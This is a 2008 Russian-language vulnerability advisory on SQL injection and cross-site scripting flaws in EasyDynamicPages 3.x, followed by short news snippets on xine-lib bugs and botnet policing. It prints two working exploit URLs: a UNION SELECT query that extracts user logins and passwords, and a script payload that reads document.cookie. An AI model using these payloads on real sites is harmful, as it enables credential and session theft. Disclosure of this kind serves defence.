|
 SQL-инъекция и межсайтовый скриптинг в EasyDynamicPages
Программа: EasyDynamicPages 3.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "year" сценарием staticpages/easycalendar/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://Example/dynamicpages/index.php?page=individual&table=
edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3, concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,
puPassword,0x3c656e64706173733e), 5,6/**/from/**/edp_puusers/*
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "year" сценарием staticpages/easycalendar/index.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://Example/staticpages/easycalendar/index.php?PageSection=1 &month=4&year=<script>alert(document.cookie);</script>
www.xakep.ru
Технологии безопасности связи 24-07-2008
Множественные уязвимости в xine-lib 16-08-2008 Технологии безопасности связи
Программа: xine-lib 1.xНайденные уязвимости позволяют удаленному злоумышленнику выполнить произвольный код на целевой системе.1) Уязвимость возникает из-за ошибки в проверке входных данных при обработке ID3 тэгов в src/demuxers/id3.c. Атакующий может передать специально сформированные поля, содержащие размер заголовка ID3 фрейма, что приведет к переполнению динамической памяти и выполнению произвольного кода.2) Уязвимость возникает ...
Голландская полиция разрушает ботнет Shadow 15-08-2008 Технологии безопасности связи
Голландский отдел по борьбе с преступлениями в сфере высоких технологий на прошлой неделе обнаружил приаресте 19-летнего голландца массовую бот-сеть. После этого подразделение обратилось в "Лабораторию Касперского" с просьбой проинструктировать жертв, вовлеченных в ботнет, на предмет удаления вредоносного ПО, установленного на их машинах. Удаление этого ПО означает конец сети.По запросу полиции Нидерландов в "Лаборато...
Малолетних хакеров наставят на путь истинный 14-08-2008 Технологии безопасности связи
Работники свердловского отделения "К" взяли шефство над малолетними хакерами. Как сообщает "Новый Регион", отделение "К" занимается воспитанием детей и подростков, уличенных в сетевых преступлениях.Об этой необычной практике борьбы с преступностью в Интернете рассказал заместитель начальника свердловского отдела "К" Артем Письменный. Он отметил, что в столице Урала очень много "малолетних ком...
|
|
